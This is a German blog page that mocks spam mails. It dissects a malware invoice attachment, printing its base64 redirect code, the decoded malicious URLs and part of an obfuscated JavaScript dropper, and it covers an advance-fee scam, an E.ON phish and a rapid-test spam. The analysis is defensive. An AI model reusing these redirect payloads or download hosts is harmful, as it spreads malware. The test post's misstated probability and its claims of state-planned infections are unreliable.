Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.


Kategoriearchiv „Mail“

Ihre Rechnung 146648577349 von der Böttcher AG

Freitag, 30. September 2022

⚠️ Warnung, Schadsoftware! Auf gar keinen Fall den Anhang klicken! ⚠️

Von: Böttcher AG <no-reply@glenat.com>
An: undisclosed-recipients: ;

So so, eine Rechnung, die an ganz viele Empfänger auf einmal geht. 😂️

Natürlich kommt diese Spam nicht von der Böttcher AG, sondern von schwerkriminellen Spammern, die Rechner anderer Leute mit Schadsoftware übernehmen wollen. Bevorzugt kleine und mittelständische Unternehmen. Denen droht dann oft die Insolvenz, und dann werden Erpresser halt bezahlt. 😕️

Ihre Rechnungsnummer: 146648577349
Ihre Kundennummer: 646756981732962

Lieber Kunde,

Hach, so viele schöne Zahlen, aber der einzige Name, den ich habe, ist „Lieber Kunde“. Die scheinen ihre Kunden aber nicht zu mögen. 😁️

beiliegend erhalten Sie Ihre Rechnung als HTML-Dokument.

Ah ja! Da ist ja tatsächlich ein Anhang dran. Da steht aber nicht so viel drin. Der ist nur eine Weiterleitung zu einer base64-codierten URL. Na gut, fange ich mal an – wie üblich arbeite ich mit meiner Kommadozeile unter Linux:

$ cat Rechnung-b-a_0000003198.html 
<body id="kqisC2MKfeohSuvlhlQyUmZZdlUGTxyDYNrBPoW05qdsUurHk2yYsHp4DgvqGBSbC5Aut1qSVdJDugOkeNeshVsoPBGnbKJ3UCLXYnFs4Bu" onpageshow="document.location.href=window.atob('aHR0cHM6Ly8zdDguYXQvYXBEOHFsb1M=');">
$ echo aHR0cHM6Ly8zdDguYXQvYXBEOHFsb1M= | base64 -d; echo 
https://3t8.at/apD8qloS
$ mime-header https://3t8.at/apD8qloS | grep -i ^location
location: https://info-opensocial.googleusercontent.com/gadgets/ifr?url=https://hatcherlawgroup.com/img/inf/inf
$ _

Ab jetzt geht es nur noch mit einem richtigen Browser weiter, weil zum Zugriff auf die gängelnde und gefährliche Google-Cloud leider Javascript benötigt wird. Ja, dieser hochgefährliche Sondermüll wird anonym und kostenlos in der Cloud eines Google-Kontos gehostet. Ist es nicht „schön“, wie einfach das alles geworden ist? Hier ist längst ein Paradies für Kriminelle entstanden. Ich habe mir mal den Spaß gemacht und in einer virtuellen Maschine den Download gemacht. Die Datei ist ein ZIP-Archiv, das es in sich hat:

$ ls -lh *.zip
-rw-rw-r– 1 elias elias 96K Sep 30 15:21 5640955135.zip
$ zip -sf 5640955135.zip 
Archive contains:
  xi1132111.js
Total 1 entries (418953 bytes)
$ unzip 5640955135.zip 
Archive:  5640955135.zip
  inflating: xi1132111.js  
$ _

Dettelbach ist überall! 😱️

Diese Datei ist kein Dokument, sondern Programmcode, der nach klicki-klicki Doppelklick vom Windows Script Host ausgeführt wird. Dieser Programmcode ist ausgesprochen kryptisch formuliert und…

$ wc xi1132111.js 
     2    373 418953 xi1132111.js
$ _

…steht in lediglich zwei Zeilen, die aber insgesamt rd. 420 Kilobyte Javascript-Programmcode enthalten. 😮️

Um einen Eindruck davon zu vermitteln, wie vorsätzlich schwierig analyisierbar und kryptisch dieses Programm gecodet ist, gebe ich hier mal das erste Kilobyte aus und füge nach jedem Komma einen Zeilenumbruch ein, damit man es noch bequem lesen kann:

$ dd status=none if=xi1132111.js bs=1024 count=1 | sed 's/,/,\n/g'; echo 
function _0×3cd5(){var _0×11cf11=['\x2f\x67\x2c\x66\x5b\x31\x46\x5d\x29\x29\x3b\x31\x67\x3d',
'\x6a\x70\x66\x57\x51',
'\x79\x5c\x5a\x22\x2c\x22\x5c\x6a\x5c\x6d\x22\x2c\x22\x5c',
'\x56\x6b\x72\x7a\x62',
'\x5c\x6b\x22\x2c\x22\x5c\x74\x5c\x31\x62\x22\x2c\x22\x5c',
'\x4f\x6f\x4d\x6c\x57',
'\x4d\x41\x58\x41\x73',
'\x5c\x63\x5c\x68\x5c\x73\x5c\x63\x5c\x59\x5c\x63\x5c\x63',
'\x75\x5d\x2b\x66\x5b\x31\x76\x5d\x2b\x66\x5b\x31\x6d\x5d',
'\x61\x5c\x62\x5c\x62\x5c\x61\x5c\x62\x5c\x53\x5c\x4a\x5c',
'\x6a\x61\x61\x67\x70',
'\x7c\x7a\x6d\x42\x45\x6f\x52\x53\x64\x7c\x78\x34\x42\x7c',
'\x61\x77\x6e\x6c\x69',
'\x49\x65\x52\x45\x67',
'\x5c\x73\x5c\x63\x5c\x43\x5c\x63\x5c\x70\x5c\x61\x5c\x69',
'\x72\x4d\x79\x54\x48',
'\x49\x6d\x77\x47\x67',
'\x42\x69\x74\x77\x49',
'\x5c\x75\x5c\x6e\x5c\x6d\x5c\x72\x5c\x61\x5c\x64\x5c\x6b',
'\x77\x7a\x77\x47\x71',
'\x61\x5c\x62\x22\x2c\x22\x5c\x65\x5c\x61\x5c\x62\x5c\x64',
'\x5c\x6b\x22\x2c\x22\x5c\x6a\x5c\x55\x5c\x70\x5c\x61\x5c',
'\x5c\x2b\x5c\x2b\x20\x2a\x28\x3f\x3a\x5b\x61\x2d\x7a\x41',
'\x5c\x6f\x5c\x78\x5c\x63\x5c
$ _

Von einem neuronalen Netzwerk generiertes Bild einer verlassenen industriellen Anlage, die überall mit Blut verschmiert istSo etwas führt man doch gern auf seinem Computer aus, gelle? Vor allem, wenn es aus einer fragwürdigen Mail kommt, die von einer Rechnung faselt, aber nicht einmal eine persönliche Ansprache beinhaltet. Natürlich sollte man solchen Code nicht ausführen, auch nicht, wenn man dafür nur eine Datei doppelklicken muss. Man sollte generell E-Mail nur mit der Kneifzange anfassen. E-Mail ist sehr praktisch, das aber leider auch für Kriminelle. Wer niemals einen Anhang öffnet, der nicht vorher über ein anderes Medium als E-Mail explizit abgesprochen wurde, tut viel für seine Computersicherheit. 🛡️

Es wird sich mit an Sicherheit grenzender Wahrscheinlichkeit um Schadsoftware handeln. Diese Schadsoftware ist die neueste Brut der Kriminellen, sie wird im Moment nur von einem sehr kleinen Bruchteil der Antivirus-Programme erkannt. Zur Verdeutlichung habe ich auch einen Screenshot von VirusTotal von heute, 15:54 Uhr gemacht, weil ich hoffe, dass sich die Erkennungsrate schon in den nächsten Stunden deutlich verbessert. Das gesamte Antivirus-Schlangenöl wird also einmal mehr nicht helfen. 💀️

Vermutlich sind jetzt bereits die Netzwerke von hunderten bis tausenden Betrieben von Kriminellen übernommen worden, und in Kürze werden überall die Erpressungstrojaner Geld einfordern. Das wird Kosten verursachen und vielleicht sogar die eine oder andere Insolvenz zur Folge haben. 😵️

Auf eine Abuse-Meldung bei Google habe ich verzichtet. Ich bin nicht so ein Freund kafkaesker Erfahrungen. Stattdessen habe ich die giftige Mail an das Landeskriminalamt Niedersachsen weitergeleitet. 👮‍♂️️

Sobald Ihre Ware (Lagerware) unser Logistikzentrum verlassen hat, erhalten Sie per E-Mail eine Versandbenachrichtigung mit Link zur Sendungsverfolgung.

Den Status Ihrer Bestellung können Sie jederzeit in unserem Onlineshop www.bueromarkt-ag.de unter Mein Konto – Meine Bestellungen einsehen.
Fehlende Artikel werden automatisch nachgeliefert.

Wenn Sie einen Artikel zurücksenden möchten, nutzen Sie bitte unsere Online-Rückgabe unter Mein Konto – Rücksendung & Reklamation.

Für Rückfragen stehen wir Ihnen gern zur Verfügung.
Vielen Dank für Ihren Auftrag.

Bitte antworten Sie nicht auf diese Nachricht, da sie automatisch von einem Postfach generiert wurde, welches keine eingehenden e-Mails empfangen kann.

Mit freundlichen Grüßen

⚠️ Bitte auf gar keinen Fall darauf reinfallen! ⚠️

vertrauliche Informationen

Freitag, 30. September 2022

In einer unverschlüsselten E-Mail, die offen wie eine Postkarte durch das Internet befördert wird? 🤭️

Von: vertrauliche Informationen /<marvin.aquino.jalapa@pgn.gob.gt>
Antwort an: jonathonsher@yahoo.com <jonathonsher@yahoo.com>
An: undisclosed-recipients: ;

Die Spam wurde übrigens von einer IP-Adresse aus Guatemala versandt, einem recht seltenen Gast im Spameingang. Kann ich verstehen, dass der angebliche Kanadier sich lieber in Mittelamerika aufhält, da ist das Wetter doch deutlich angenehmer. 🌄️

Aber trotzdem: Es ist die übliche Dreieinigkeit des Vorschussbetruges: Der Absender ist gefälscht, die Antwort geht an eine kostenlos und anonym eingerichtete Freemail-Adresse (zur Abwechslung mal nicht bei Google) und die Mail geht an ganz viele Empfänger auf einmal, ist also so persönlich wie ein Reklamezettel im Briefkasten. Mehr muss man nicht wissen, um den Müll zu löschen. 🗑️

Außer, man möchte noch mal herzlich über eine hanebüchene Geschichte zur Einleitung eines Vorschussbetrugs lachen. 😄️

Hallo, Ich bin Jonathan Sherman. Ich bin der Sohn eines kanadischen Builloniers. Ich möchte ein Haus in Ihrem Land kaufen, wo ich mit meiner Familie umziehen kann. Wenn Sie so freundlich wären, mir zu helfen, jemanden in Ihrer Nähe zu finden, bin ich bereit, 40 % meines Erbes mit Ihnen zu teilen. Goldgeld auf der Bank einzahlen und vieles mehr. Dies ist nur eine Einführung in das, was ich gerne mit Ihnen besprechen möchte. Wären Sie so freundlich, mich für weitere Einzelheiten zu kontaktieren? Das ist vertraulich, ich wollte es nie öffentlich machen. Aus diesem Grund muss ich Ihre E-Mail persönlich ansprechen. Bitte kontaktieren Sie mich für weitere Details. Ich verspreche, ich werde nicht viel von Ihrer Zeit in Anspruch nehmen. Ich brauchte nur jemanden, dem ich meinen vertraulichen Umzugsplan anvertrauen konnte. wenn Sie so freundlich wären, sich an meine private E-Mail-Adresse zu wenden: Ich werde Ihnen alle Einzelheiten des Grundes für meinen Umzug mitteilen. private E-Mail: JonathonSherman@outlook.com Privates WhatsApp: +1(289)645■■■■ Mit freundlichen Grüßen, Jonathan Shermann.

Von einem neuronalen Netzwerk generiertes Bild eines Mannes mit vielen Banknoten im HintergrundHallo! 👋️

Ich habe keine verdammte Ahnung, wie du heißt oder wer du bist, aber ich kenne immerhin meinen eigenen Namen. Den kennt ja auch nicht jeder. Ich bin Jonathan, Sohn eines kanadischen Billionärs. Wie man „Billionär“ schreibt und welchen Zweck Absätze in einem Text haben, hatte ich leider noch nicht an der Schule. 😶️

Aber ich habe schon eine Familie, und mit der möchte ich umziehen. In dein Land, bei dem ich lieber nicht erwähne, wie es heißt, denn diese Spam geht völlig wahllos (und öfter von einem Computer übersetzt) an ganz viele Empfänger aus diversen Ländern. Um dort auch wohnen zu können und mich nicht unter der Brücke zusammen mit den politisch gewünschten Totalverarmten in der Bundesrepublik drängeln zu müssen, möchte ich ein Haus kaufen. Weil ich auch noch nicht an der Schule gelernt habe, wie das mit dem Kaufen geht, guck doch mal, ob jemand in deiner Umgebung das weiß oder ob du einen Makler in deiner Stadt hast. 🏡️

Komm, das glaubst du mir doch! Dass ich einfach wahllos irgendwelche Leute anmaile, weil sie so eine schöne Mailadresse mit Gammelfleisch im Namensteil haben, statt einfach in einem Branchenverzeichnis einen Makler rauszusuchen, der mir ein schönes Haus verkauft. Der ist zwar auch eine Fäkalmade und hat keine Hemmungen, eine höchst asoziale Wucher-Courtage zu nehmen, aber ich muss ihm nicht vierzig Prozent meines Billionärs-Erbes nebst einer Kollektion meiner schönsten Goldbarren anbieten. 👍️

Von einem neuronalen Netzwerk generiertes Bild einer Tafel mit undefinierbaren SchriftzeichenMeine wirre Mail aus der Klapsmühle ist auch nur eine Einführung in das, was ich mit dir noch besprechen will. Komm, du bist auch doch ganz heiß darauf, mehr wirre und irre Geschichten vom schlechten Erzähler zu hören! Also antworte mir einfach! Aber natürlich nicht an die Absenderadresse, die ist gefälscht. Und trotzdem ganz feste daran glauben, dass das mit dem Riesenhaufen Geld stimmt. Das muss alles übrigens voll geheim bleiben, ich will nicht, dass mein Psychiater davon erfährt. Also betrachte meine ganz geheimen Geheimpläne für meinen Geheimumzug als Geheimgeheimnis und rede mit niemanden darüber! Deshalb schreibe ich meine Geschichten zur Einleitung eines Vorschussbetruges ja auch auf Postkarten und benutze keine Verschlüsselung. 🔓️

Gut: In Wirklichkeit weiß ich, dass jemand, der seine E-Mail verschlüsselt, schon zu intelligent sein wird, um auf meinen plumpen Betrug reinzufallen. Und außerdem könnte ich nicht so einfach meine Massenpost machen, sondern müsste jede einzelne meiner hunderttausenden von Spams individuell für den Empfänger verschlüsseln. Da würde mein gesamtes Geschäft als Vorschussbetrüger zusammenbrechen. Da müsste ich ja richtig arbeiten und mir Mühe geben. Wenn ich das wollte, brauchte ich doch nicht zu spammen. 🛠️

Wenn du so enddumm bist, mir zu antworten, verspreche ich dir, dass ich und meine Bande sich stundenlang mit dir beschäftigen werden. Wir quasseln dich dumm, bis wir dein Gehirn einfach auslöffeln können. Du hast ja gezeigt, dass man dir leicht irgendwelche wirren Geschichten glaubwürdig machen kann, und das werden wir schonungslos ausnutzen und dich ausnehmen wie eine Weihnachtsgans. Du hast immer ganz viel Geld vor Augen…

Eine alte Karikatur, die den auf einem Esel reitenden Tod zeigt, der dem Esel mit einer Angelleine eine Karotte vor Augen hält, damit er weiter geht. Der Esel rennt gierig auf den Abgrund zu.
Bild: Wikimedia Commons, Lizenz: Public Domain

Von einem neuronalen Netzwerk generiertes Bild von Banknoten in einem Koffer…und bezahlst eine Vorleistung nach der anderen, weil wir die bescheuersten Methoden zum Geldtransfer benutzen, die in unserer Fantasie so aufgesprossen sind. Wir schicken dir keinen Scheck in einem versicherten Brief, den du einfach bei deiner Bank einreichen könntest, wir haben spezielle Spezialverfahren, bei denen ganz viele Vorleistungen fällig werden, fünfzigmal übler als noch die abzockerischsten Bankgebühren. Da wird dann hier eine Gebühr fällig und dort noch eine Gebühr fällig, und dann noch einmal eine teure notarielle Beglaubigung zur Erklärung gemäß Geldwäschegesetz von Fantastistan, und natürlich eine obskure Gebühr für einen Treuhänder, der das Geld bar in einer Schatzkiste neben seinem Bett vorhält. Und natürlich noch eine Bestechung für einen korrupten Beamten, die darf ja auch nicht fehlen. 💸️

Und das musst alles du bezahlen, weil ich, Jonathan der Billionärssohn, gerade kein Kleingeld in der Tasche habe. Und natürlich habe ich auch kein Bankkonto, so dass es am besten ist, wenn du einfach, schnell und anonymisierend über Western Union und Konsorten bezahlst. Mit dem Geld kaufen wir dann Kokain und Autos und gehen in den Puff. Ist doch viel angenehmer, wenn wir dein Geld verprassen, statt arbeiten zu gehen. 😊️

Die Story von Jonathan ist nichts als Lüge. 🤥️

Bitte auf gar keinen Fall an die Absenderadresse antworten. Die ist gelogen. Und wenn du leichtgläubig bist, aber Probleme mit dem Schreiben hast, gibt es auch eine WanzApp-Nummer für dich. Reden musst du schon noch können. Das muss auch nicht unbedingt strukturiert, zusammenhängend oder nachvollziehbar sein, was du redest, hauptsache du hast genug Geld, dass es sich lohnt, dich auszunehmen. Deshalb machen wir auch WanzApp. 📞️

Ich will schließlich keinen Idioten davon ausschließen, zum Opfer eines Vorschussbetruges zu werden, denn ich lebe vom Betrug. 💩️

Mit Winkewinke
Dein Jonathan mit angeflanschtem Geldsack

Letzte Warnung! Ein Betrag steht für Sie bereit.

Donnerstag, 29. September 2022

Von: E.ON <administrator@ssmgctrainingcentre.com>
An: gammelfleisch@tamagothi.de

Der Absender ist nicht E.ON, und der Empfänger bin nicht ich. Denn so verdorben wie diese Mailadresse bin ich noch nicht. 😉️

Es ist eine Spam, die mindestens an jede Mailadresse geht, die Spammer irgendwo im Web einsammeln können. Es gibt kein Geld von E.ON. Es ist eine Lüge, mit der Empfänger dazu überrumpelt werden sollen, in die Spam zu klicken.

Sehr geehrter Herr / Frau,

E.ON wüsste, wie seine Kunden heißen.

Aufgrund der Situation in der Ukraine und des unsicheren und hohen Gaspreises erreichen uns derzeit viele Fragen und das ist logisch. Als Unternehmen sind wir verpflichtet, unseren Kunden die richtigen und erschwinglichen Preise anzubieten.

E.ON ist als börsennotiertes Unternehmen auch nicht seinen Kunden verpflichtet, sondern seinen Aktionären. Und mit Verlaub: Das merkt man! 🤮️

Was bedeutet das fur mich?
Sie haben in den letzten Monaten mehr Gas bezahlt, als Sie verbraucht haben. Wir erstatten Ihnen den Betrag von 591,56 Euro innerhalb von 5 Werktagen auf Ihr Konto zuruck.

E.ON sendet seine Jahresabrechnungen mit eventuellen Nachzahlungen oder Erstattungen zuviel gezahlter Abschlagszahlungen auch mit der Sackpost. An Kunden, die namentlich angesprochen werden. Unter Nennung einer Vertragsnummer. Mit einer klar strukturierten Rechnung, aus der hervorgeht, was gezahlt wurde und wieviel verbraucht wurde. 😉️

Oder sollte E.ON neuerdings schwamming und informell formulierte E-Mail mit „das ist logisch“ und „mehr Gas bezahlt, als Sie verbraucht haben“ versenden und dafür auf eine Rechnung verzichten? Das wäre aber sehr albern und dumm von E.ON. Dafür nehmen die das mit dem Geld viel zu ernst. Die sind ja auch ihren Aktionären verpflichtet… 🤑️

Übrigens kann E.ON auch Umlaute in seine Texte schreiben. 😅️

Was soll ich machen?
Klicken Sie hier, um Ihre Bewerbung einzureichen.

Was man auf gar keinen Fall und niemals machen sollte: In eine E-Mail auf „Click here“ klicken. Es ist immer ein Fehler. Solche Sprachstummel finden sich nur in krimineller Spam und in mieser Reklame. 👎️

Ich sortiere mit einer (leider wegen der vielen derartigen Formulierungen etwas kompliziert geratenen) Click-here-Regel seit vielen Jahren die Spam aus. Es gab in den ganzen Jahren nicht eine einzige falsche Erkennung. Es war alles Müll, der direkt und automatisch ins Klo sortiert werden konnte, ohne dass ich weitere Lebenszeit dafür aufwänden müsste. Denkende und fühlende Menschen, deren Mitteilungen einen Wert haben, schreiben nicht „Click here“ in ihre Mails. 💡️

Und überhaupt: Seit wann muss ich mich eigens „bewerben“, um eine Rechnung von E.ON zu erhalten? 😂️

Ich habe den Link, der sehr kryptisch weitergeleitet wird, so dass ich die Weiterleitungskette nicht automatisiert verfolgen konnte¹, jetzt nicht bis zum bitteren Ende untersucht, weiß aber schon in der Mitte des Weges, dass es hier eine „kostenlose Sicherheitsprüfung“ von Computer, Betriebssystem und Browser durch Kriminelle gibt. Wer durchgefallen ist, hat nach dem Klick einen Computer anderer Leute auf dem Schreibtisch stehen. Was die damit machen, weiß ich nicht. Sie könnten spammen, betrügen, über eine fremde IP-Adresse so genannte „Cyberangriffe“ durchführen, Bilder und Videos von sexuellem Kindesmissbrauch hosten, das Online-Banking manipulieren oder einen Erpressungstrojaner installieren. Alles ganz nach Belieben. Auch gern in Kombination. Und nichts davon wird erfreulich sein. ☹️

Dagegen hilft übrigens am zuverlässigsten ein aktuelles Betriebssystem und aktuelle Software, so leidig die ganze Updaterei auch immer ist. Und natürlich hilft es, wenn man nicht in E-Mail klickt und auch keine Anhänge aus E-Mail öffnet. Antivirus-Schlangenöl hilft nicht, wenn man es mit der neuesten kriminellen Brut zu tun hat. 😉️

Links und Anhänge in E-Mail sind zurzeit der häufigste Transportweg für Schadsoftware. Und so lange Menschen in E-Mail klicken, wird das wohl auch so bleiben. Ich empfehle, nur Links und Anhänge zu öffnen, die vorher auf einem anderen Weg als mit E-Mail abgesprochen wurden, zum Beispiel telefonisch – denn auch die Absenderadresse eine E-Mail kann beliebig und kinderleicht gefälscht werden. Alternativ könnte man natürlich auch durchgehend digitale Signaturen verwenden, aber das ist den Menschen ja zu kompliziert. Dafür müssten sie ja klicken können. 🖱️

Wer noch sicherer gehen will, sollte neben dem für die Computersicherheit unverzichtbaren Werbeblocker auch einen wirksamen Javascript-Blocker im Webbrowser verwenden. Damit werden nahezu alle kriminellen Angriffe auf den Browser abgewehrt². Der Preis dafür ist allerdings, dass man von Hand vertrauenswürdigen Websites erlauben muss, Javascript im Browser auszuführen. Das ist vielen auch zu mühsam. Dafür muss man ja klicken können. 🖱️

Erstaunlich, dass die Menschen immer die paar Klicks hinbekommen, um ein in der Praxis wirkungsloses Antivirus-Schlangenöl zu installieren und sich in gefühlter Sicherheit zu suhlen! 🖱️🤦‍♂️️

Wir hoffen, Sie damit ausreichend informiert zu haben.

Nein. Eine ausreichende Information zu den Kosten eines Vertrages, den ich habe, ist die Rechnung. „Ihr“ habt nur geschwafelt. 😁️

Haben Sie irgendwelche Fragen? Sie konnen uns gerne kontaktieren.

Wie? In einer Séance? Hirntot seid „ihr“ schon. Und irgendwelche Kontaktdaten habt „ihr“ nicht angegeben. ☎️

Mit freundlichen Grussen
E.ON

Wenn das die Freundlichkeit ist, will man den Hass aber auch nicht mehr kennenlernen. 😡️

Entf! 🗑️

¹Da ist viel vorsätzlich unlesbares Javascript im Weg. Das wird gemacht, um eine Analyse zu erschweren, und es funktioniert leider gut. Ich habe nach der vierten Weiterleitung aufgegeben. Trotz des durchwachsenen Wetters weiß ich etwas Besseres mit meiner Lebenszeit anzufangen.

²Es gab in den letzten zehn Jahren in der Praxis nur einen Angriff auf Webbrowser, der kein Javascript-Angriff war. Dabei wurde ein Fehler im integrierten PDF-Viewer des Firefox ausgebeutet. Alle anderen Angriffe auf Webbrowser erforderten Javascript. Ich würde den integrierten PDF-Viewer in einem Browser übrigens nicht benutzen. Er schafft eine unnötige zusätzliche Angriffsfläche, die auch tatsächlich schon einmal zu Angriffen führte. Ich sehe auch nicht, wo der Komfortverlust sein soll, wenn ein PDF nach dem Klick in einem schlanken PDF-Viewer wie Atril geöffnet wird, statt im Fenster eines fetten, überkomplexen Webbrowsers. Wo man so etwas im Firefox einstellt: In den Einstellungen, unter Allgemein, dort unter Anwendungen. Schon ein bisschen versteckt.

Covid19 Herbstwelle baut sich auf – Preise steigen – Jetzt Mitarbeiter schützen und 5% sparen mit Code Herbst5

Mittwoch, 28. September 2022

Diese Spam kam auf einer Honigtopfadresse an, die für menschliche Leser dieses Blogs völlig unsichtbar bleibt, nicht jedoch für die Harvester der Spammer. Es handelt sich klar um Spam, und die ist klar illegal und erweckt den Verdacht, dass man es mit einem mindestens halbseidenen, wenn nicht gar betrügerischen Anbieter zu tun hat. Ob der wohl eine gute Beratung in Gesundheits- und Hygienefragen ist? 🤔️ ‌‌

psa-partner.de_Logo

So weit kommt es noch, dass ich in einer Spam die Grafiken nachlade! 🖕️ ‌

Schnelltest-Großlager – Jetzt 5% Neukundenrabatt sichern!

Ah ja, und was testen die Schnelltests? So ein Schwangerschaftstest ist ja auch ein Schnelltest. 😁️ ‌

Inzidenzen sind wieder stark angestiegen.
Jetzt mit uns ausrüsten und 5% sparen!

Schnelltests helfen aber nicht gegen ansteigende Inzidenzen. 😐️ ‌

Jetzt Schnelltests für dieses Jahr sichern!

Ob für Ihre Mitarbeiter, Ihr Unternehmen oder Testzentrum: Sparen Sie 5% auf das gesamte Sortiment, mit dem Code Herbst5!

Läuft der Großbetrug [Archivversion] mit den „Corona-Testzentren“ immer noch? Wird der immer noch ohne jede Kontrolle von der BRD finanziert, damit sich irgendwelche schmierigen Verbrecher die Taschen vollstopfen können?

Ich muss an dieser Stelle einmal etwas persönliches erwähnen: Jemand, den ich flüchtig kenne, hat ein schulpflichtiges Kind, und als der Präsenzunterricht wieder eingeführt wurde, hat man das mit verpflichtenden Coronatests „abgesichert“. An der Schule gibt es rd. achthundert Schüler.

Kein einziger Test war positiv. 😮️

Ich habe meinem flüchtigen Bekannten empfohlen, sofort sein Kind von dieser Schule zu nehmen, wenn er es gern hat.

Warum?

Nun, der verwendete Test hat lt. Spezifikation ungefähr ein Prozent falsche Positivtestungen geliefert. Wenn man ein Kind damit testet, ist die Wahrscheinlichkeit, dass es falsch als positiv erkannt wird, also 99/100. Wenn man zwei Kinder testet, ist die Wahrscheinlichkeit, dass eines davon als falsch positiv erkannt wird, (99/100)^2, wenn man fünf testet, ist sie (99/100)^5 und wenn man 800 Kinder testet, liegt die Wahrscheinlichkeit, dass keines von ihnen fälschlich als positiv erkannt wird…

$ bc -q
scale=50
(99/100)^800
.00032222236288023602480016625853919897822523591953
‌quit
$ _

…lediglich um 0,3 ‰. Von möglicherweise erkrankten und infektiösen Schülern ist bei dieser Betrachtung noch gar nicht die Rede, es geht nur um die falsche Positivrate. Die Wahrscheinlichkeit einiger erkrankter Schüler senkt die Wahrscheinlichkeit eines solchen Ereignisses noch stärker. Es wurden in der Bundesrepublik Deutschland schon Menschen für wesentliche schwächere Indizien von einem Gericht verurteilt. Die dort durchgeführten Tests waren ein betrügerischer Mummenschanz. Willkommen in der Kultusverwaltung des Landes Niedersachsen!

Dass die Tests an dieser Schule betrügerisch waren, ist für mich und jeden anderen Menschen mit einem Gehirn und mit Realschulkenntnissen im Rechnen offensichtlich. Leider hat mein Bekannter zu viel Angst vor den Folgen für sein Kind gehabt, wenn er gegen die offensichtlichen Zustände angeht – das kostet schnell mal zwei Zensurenstufen in jedem Fach und führt zu jahrelangem Mobbing des Kindes durch die Lehrer. Natürlich hat sich das Kind dann infiziert. Genau so, wie es staatlich geplant war. ☣️

(Wir müssen froh darüber sein, dass die Omikron-Variante des Corona-Virus nicht so ein großer Mörder ist und oft sehr harmlos verläuft. Da haben wir Glück gehabt. Das muss man auch mal haben. Aber sich auf das Glück zu verlassen, ist verantwortungsloses Zockergehabe.)

Lehrer an antihygienischen BRD-Zwangsschulen, die mir das wegen ihrer überheblichen Dummheit, Bildungsferne und Wissenschaftsfeindlichkeit als stinkende Frucht ihres „geisteswissenschaftlichen“ Bullshit-Studiums nicht glauben wollen, können ja mal den Mathe-Kollegen fragen. Der wird es bestätigen. Der kann nämlich wenigstens rechnen. 👍️

Kann ja leider nicht mehr jeder. ☹️

Kurz: Es wurde massenhaft mit Tests betrogen, die gar nichts getestet haben. Dies geschah in Hannover ganz sicher an einigen Schulen, aber vermutlich auch in Betrieben. Niemand hat das kontrolliert. Niemand hat auch nur die leiseste Plausibliätsprüfung über die Ergebnisse gemacht, für die man kein weiteres Hilfsmittel als einen Taschenrechner benötigt. Für die Dienstleistung, nichts testende Schnelltests aus preiswertem Fließpapier in einer preiswerten Standard-Plastikhülle (vermutlicher Preis in Massenproduktion wohl unter fünf Cent) zu machen, wurden Milliardenbeträge kassiert. Ohne jegliche Kontrolle. Wer weiß, vielleicht haben einige ihre Tests auch preiswert bei solchen Spammern wie unserem heutigen Exemplar gekauft. ☹️

Spart ja Geld. 🤑️🤦‍♂️️

Hallo

Genau mein Name! 👍️

das Oktoberfest, das als das größte Volksfest der Welt gilt, ist aktuell in vollem Gange. Dies macht sich durch die aktuellen Corona Fallzahlen deutlich bemerkbar und werden in den nächsten Tage mit Sicherheit noch deutlich nach oben schellen.

Dagegen helfen keine Tests vom Spammer. Dagegen helfen vermutlich nur auf dem Marienplatz vorm Rathaus reichlich verabreichte Stockschläge auf den nackten Popo für alle Verantwortlichen, bevor man sie einfach machen lässt. Denn diese Leute – einschließlich des werten Herrn Ministerpräsidenten – können vermutlich nur durch Schmerzen lernen. Appelle an die Allgemeinbildung sind nicht zielführend, weil die Allgemeinbildung nicht vorhanden zu sein scheint… und überhaupt, wenn es doch um so viel schönes Geld geht. Geld, versteht ihr, Geld! Was wollt ihr da mit Gesundheit? 😡️

Auch andere Volksfeste sind in Bayern mitte September zu Ende gegangen und lassen die Fallzahlen in den Landkreisen explodieren, welche aktuell, mit über 800-900, als die höchsten Zahlen deutlschlandweit gelten.

Hier in der Bundesrepublik Deutschland wurden schon bei wesentlich höheren Inzidenzen alle Maßnahmen zur Seuchenbekämpfung aufgegeben… wenn es um so viel Geld geht… ach!

Viele Unternehmen und Mitarbeiter testen sich weiterhin regelmäßig, auch bei Urlaubsrückkehr oder Verdacht. Das präventive Testen in Unternehmen gilt immernoch als eine der effektivsten Möglichkeiten, sich und andere Menschen zu schützen.

Nein, die effektivste Möglichkeit, sich selbst und andere Menschen zu schützen, ist Vorsicht, Hygiene und (ja, ich weiß!) die Nutzung von gut getragenen Masken. 😷️

Wir als zertifizierter Fachhändler für Schutzausrüstung und Antigentests möchten Sie auch weiterhin gerne auf dem Weg aus der Pandemie begleiten

Wer hat euch den „zertifiziert“? Darf ich mal das „Zertifikat“ sehen? Und vor allem: Zertifiziert es euch auch für das Spam-Marketing? 🤥️

Trotz durch die Ukrainekrise massiv gestiegener Import- und Rohstoffpreise bleiben unsere Preise stabil! Zusätzlich möchten wir Ihnen gerne wieder Ihren Einkauf mit einem Rabattgutschein in Höhe von 5% erleichtern. Verwenden Sie dazu einfach beim Checkout den Gutscheincode Herbst5 und erhalten Sie automatisch 5% auf Ihren gesamten nächsten Einkauf.

Wenn sie jetzt bestellen, erhalten sie kostenlos eine Probepackung Viagra und unsere neueste Schlankheitspille. 😁️

Wir würden uns freuen, wenn Sie uns auch weiterhin als kompetenten Partner ihr Vertrauen schenken würden.

Weiterhin? Ich habe euch noch nie irgendein Vertrauen „geschenkt“. Ich weiß bis jetzt noch nicht einmal, wer ihr seid, und ihr kennt mich auch nur als „Hallo“. Nach Empfang eurer Spam kann ich nur von eurem Angebot abraten. Spam ist niemals ein gutes Zeichen. 💡️

Ihr Team von PSA-Partner.de

Ihr seid nicht „mein“ Team. Ihr seid Spammer. 💩️ ‌ ‌So, und jetzt noch die weiteren Lügen, zu denen ich natürlich auch nicht die beabsichtigten Grafiken sehe. ‌

lieferung ‌ Sofortige Lieferung

Die bestellte Ware verlässt auf schnellstem Weg unsere Lager.

frei_haus ‌ Lieferung frei Haus

Je nach Bestellumfang versenden wir kostengünstig mit DHL oder per Spedition.

rechnung ‌ Zahlung auf Rechnung

Sie können die Ware ganz bequem erst nach Erhalt bezahlen. ‌‌ Chil

Wer ist denn „Chil“? 😁️ ‌

BESTSELLER: Jetzt ab 0,79 € / Stk.**

Chil Comfort Check Covid-19 Antigen Schnelltest

Eigenschaften:
Bfarm: AT 147/22
Sensitivität: 98.75%
Spezifität: 99.72%
Einer der besten LOD-Werte auf dem Test-Markt in Anbetracht der Früherkennung
– BfArM + Paul Ehrlich-Listung
– CE- zertifizierter Laientest in 1er-Packung
– Attraktivstes Preis-Leistungsverhältnis

JETZT BESTELLEN!✔️

